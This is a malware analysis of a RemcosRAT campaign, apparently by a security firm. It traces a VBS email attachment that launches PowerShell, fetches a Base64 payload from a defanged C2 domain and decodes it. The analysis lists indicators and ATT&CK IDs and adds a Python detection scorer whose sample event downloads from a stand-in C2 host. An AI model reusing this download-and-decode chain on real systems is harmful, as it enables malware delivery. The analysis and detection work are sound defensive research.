[Pipeline Research] Investigating A Prepared Campaign of RemcosRAT

Pipeline, Inc. observed a recent RemcosRAT malware campaign. The threat actor distributed a malicious VBS file as an e-mail attachment. The infection chain is shown below:

Photo: Infection Chain We Observed
We first found a heavily obfuscated VBS e-mail attachment that was hard to analyze. After de-obfuscating it, we found that the function below is executed by PowerShell:

This snippet of code is executed by Wscript.Shell. It downloads the second payload from the C2 server using the PowerShell cmdlet Start-BitsTransfer and writes the payload to a local file named Asturi.Bel. The C2 server URL is:
hxxps[://]spiderzlame[.]shop/Memoreres[.]hhk
Surprisingly, when we visited the domain, we got this:

Even when we tried to get the Whois information for the domain, we got 'Server is busy now, please try again later.', as shown below:

This is why it appears to be a well-prepared threat campaign, with obfuscation at every stage. The payload downloaded from the C2 is a very long Base64 string (more than 200k characters):

Photo: Base64 Payload Downloaded from C2
The payload is decoded using the [System.Convert]::FromBase64String() method. The malware then uses the [System.Text.Encoding]::ASCII.GetString() method to convert the byte array to a string. De-obfuscation is not complete at this point, because some garbage text is still present in the payload. So the malware uses the substring() function to extract the actual payload:

This payload contains a function, Spnding02(), at the beginning, which is used to de-obfuscate the next-stage payload. After de-obfuscating and simplifying the payload, it looks like this:

The malware was found to connect to another domain:
windowsupdatebg[.]s[.]llnwi[.]net
The e-mail attachment is named 'importe PDF.vbs'. The malware sleeps for some time as an evasion technique and uses the VirtualAlloc() function to reserve memory for code to execute. Some of its command lines are shown below:

MITRE ATT&CK Mapping
T1047
T1010
T1018
T1082
T1083
T1518.001
T1105
T1497
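
The download and decode steps described above (PowerShell started by a script host, Start-BitsTransfer, FromBase64String, ASCII.GetString, substring) leave recognisable traces in process-creation logs. The following triage scorer is an added example, not code from the original write-up or from Pipeline; the event fields follow Sysmon Event ID 1, and the weights, threshold and sample events are constructed assumptions.

```python
import re

# PowerShell drops backticks inside a token and cmd.exe drops carets, so strip
# both before matching; otherwise "Start-B`itsTransfer" evades a plain search.
_NOISE = re.compile(r"[`^]")

# Behaviours come from the write-up; weights and threshold are assumptions.
INDICATORS = {
    "bits_download": (re.compile(r"start-bitstransfer\b", re.I), 3),
    "base64_decode": (re.compile(r"convert\]::frombase64string", re.I), 2),
    "ascii_to_text": (re.compile(r"encoding\]::ascii\.getstring", re.I), 1),
    "substring_cut": (re.compile(r"\.substring\s*\(", re.I), 1),
}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def score_event(event):
    """Return (score, matched indicator names) for one process-creation event."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = _NOISE.sub("", event.get("CommandLine", ""))
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmd)]
    score = sum(INDICATORS[name][1] for name in hits)
    # PowerShell started by a script host is the VBS -> PowerShell hop.
    if hits and event.get("ParentImage", "").lower().endswith(SCRIPT_HOSTS):
        hits.append("script_host_parent")
        score += 2
    return score, hits

def triage(events, threshold=5):
    """Return id, score and hits for events at or above the threshold."""
    scored = [(ev["id"], *score_event(ev)) for ev in events]
    return [{"id": i, "score": s, "hits": h} for i, s, h in scored if s >= threshold]

# Constructed events using Sysmon Event ID 1 field names; not campaign data.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "CommandLine": r"powershell Start-B`itsTran`sfer -Source https://c2.example.invalid/x -Destination $env:APPDATA\Asturi.Bel"},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Start-BitsTransfer -Source https://updates.example.invalid/tool.zip -Destination C:/Temp/tool.zip"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "CommandLine": "powershell $t=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($d)); $t.Substring(10,20)"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Because the decode chain runs on content fetched after launch, it may never appear on a command line; the same patterns can be applied to PowerShell Script Block Logging text (Event ID 4104) to catch it there.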